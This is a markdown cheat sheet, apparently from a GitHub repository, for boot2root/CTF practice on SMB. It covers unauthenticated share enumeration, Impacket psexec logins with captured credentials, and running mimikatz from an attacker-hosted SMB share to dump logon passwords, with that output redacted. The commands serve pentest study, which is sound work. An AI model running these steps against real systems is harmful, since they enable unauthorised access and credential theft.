Skip to content

Latest commit

 

History

History
79 lines (59 loc) · 2.57 KB

139, 445, SMB.md

File metadata and controls

79 lines (59 loc) · 2.57 KB

SMB - Enumeration

When completing boot2root challenges, if SMB is open (Port 139 & 445) it is reccomended to see if the user can list SMB shares unauthenticated.

The below commands are different ways in which a user can interact with SMB shares:

  • smbmap -H 10.10.10.10
  • smbclient -L 10.0.0.10

If it asks for a password, just simple hit enter and that will confirm if authentication is required or if the user can view the shares unauthenticated. If the user has read/write access to the share, it is then reccomended to connect to the share by running the below command:

smbclient //10.10.10.10/sharename

SMB - Impacket Psexec

PsExec is a portable tool developed by Microsoft that lets a user run processes remotely using user credentials on the system.

If a user has compromised a user account and has found the password of the account, the user can then psexec into the machine if there is no other ways of entry. (Example: SSH, RDP, WinRM and etc is turned off).

This method requires port 445 to be open, if it is not then the user may have to port forward the port to a listening state.

The command the user should run:

/usr/share/doc/python-impacket/examples/psexec.py hacker@10.10.10.10

The user will be prompted for hacker's password: hacker

An interactive shell should be spawned as the user hacker.

Impacket's SMBServer (For File Transfer)

Impacket's SMBServer a tool to remotely transfer, capture hashes, use executables and more.

This is how a user can capture hashes on a system once compromiosed.

On a Linux machine the user should navigate to:

cd /usr/share/windows-binaries

Identify the mimikatz executable is present then run Impacket's SMBServer:

python /usr/share/doc/python-impacket/examples/smbserver.py share .

On the compromised Windows system run:

\\10.10.10.10\share\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 29 2017 23:20:11
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 311317 (00000000:0004c015)
Session           : Interactive from 1
User Name         : 
Domain            : 
Logon Server      : 
Logon Time        : 
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : 
	 * Domain   : 
	 * NTLM     : 
	 * SHA1     : 
	 * DPAPI    :

Please note, all the above output has been redacted.